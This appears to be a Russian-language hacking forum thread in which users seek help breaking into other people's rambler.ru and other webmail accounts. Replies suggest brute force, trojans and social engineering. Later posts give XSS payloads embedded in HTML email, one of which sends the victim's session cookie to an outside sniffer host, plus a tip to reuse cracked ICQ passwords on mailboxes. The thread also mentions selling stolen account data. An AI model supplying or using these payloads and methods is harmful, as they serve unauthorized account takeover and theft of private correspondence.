![]() |
rambler.ru как взломать???
ПОдскажите как ломануть ящик на рамблере! Либо угнать сесию!
|
Взлом яшика : СИ ,трой , Брут( brutus AET2)
Самое основное , если ты этого не знаешь то читай статьи.....напиши в поисковике google вот такие слова " Как взломать почту" она тебе выдаст ! Удачи |
Брут не работает на рамблере! Уже много статей перечитал трой тяжело впарить очень акураттный ползователь, а что такое СИ??
|
|
А может какието уязвимости есть????
|
Ну есть а ты думаешь что тебе их ктото скажет!
|
А за чем тогда форум??
|
Что бы учится, а потом практиковатся, а не слюнки тут пускать.
|
Цитата:
не тупи, хоть не надо хуёню всякую писать, если малый просит, значит надо уважить(в разумных пределах). Не знаешь, что говорить не говори |
Прежде чем спросить - посмотри хотя бы в основных разделах форума.
Статьи -> Карта раздела -> Методы "вспоминания" пароля (от мыла) Цитата:
|
Цитата:
Почти перерыл весь форум ничего толкового не нашол! |
Оффтоп - > Объявления -> Просьбы о взломах.
|
Цитата:
|
https://forum.antichat.ru/showpost.p...7&postcount=10
замкнутый круг =) |
могу дать тебе гарантию, что даже если уязвиость есть, то в паблике ее не выложат, клянчить нет смысла, только унизишь себя, я через это уже прошел!
|
А я назло выложу...
А я помогу челу...
Напридумывали млин, может еще приват-сплоитом назовете? Код:
<font color="red><font color="onmouseover=javascript:alert()>Hello</font>А вообще, чел, перечитай статьи Алгола, пробуй, а потом уже проси помощи. P.S>точно работает на старом дизайне, на новом сам протестишь, если надо будет. P>S>S>Отправлять письмо в виде хэтээмэл.(галучка такая есть) |
И что этот скрипт дает???
|
@#$%^&, а ты знаешь вообще что такое xss?
|
C XSS разобрался !
Блин хлопцы я хакер!!! Почитал статьи написал скриптик работает на всех мылах тащу лог захожу даже если пользователь не в ящике ну я дал даже сам не ожидал!!!! :) :p :D ;) :rolleyes: |
Xex это ты ко мне стучал и просил продать инфу из МОА. Зря ты так. А может тебя и подставили.
|
А на рамблере не работает только на укр нете!!!
Работает только со старым дизайном!!! |
Код:
<font color=red onmouseover=window.execScript(isNaN(q="http://antichat.org/s/ваш лог.gif?"+document.cookie));window.execScript(alert(q))><a href="http://antichat.org/s/ваш лог.gif">СЮДА</a>!</font>На маил ру тоже работает!!! |
К сожалению работает только на моем компе на другом никак!!!
|
А что твой комп особенный?
|
Нет просто я когда заходил со своего компа по ящикам то я их и ломал а отослал другу тот нажал и нифига не выходит снифер все выдает но при вводе в браузер всеравно просит ввести лог и пас!!!
|
2 SanyaX:
Нет, либо меня подставили(хотя кому это нужно?это даже не мой родной ник)...либо тебе снятся сны... И просто из любопытства, сколько стоила бы такая инфа?...а то я бы вам в раза два дешевле такую толкал=)) |
Подскажите по скрипту что не так сесию вроде угоняет но при всалении в браузере всероавно нужен лог и пас!!!
|
Вот нашол еще один способ когда регистрируш мыло на рамблере тебе сразу дают асю так вот водите в поиск аси это мыло находите асю ломаем асю и этот же пароль подходит к ящику!
|
| Время: 10:39 |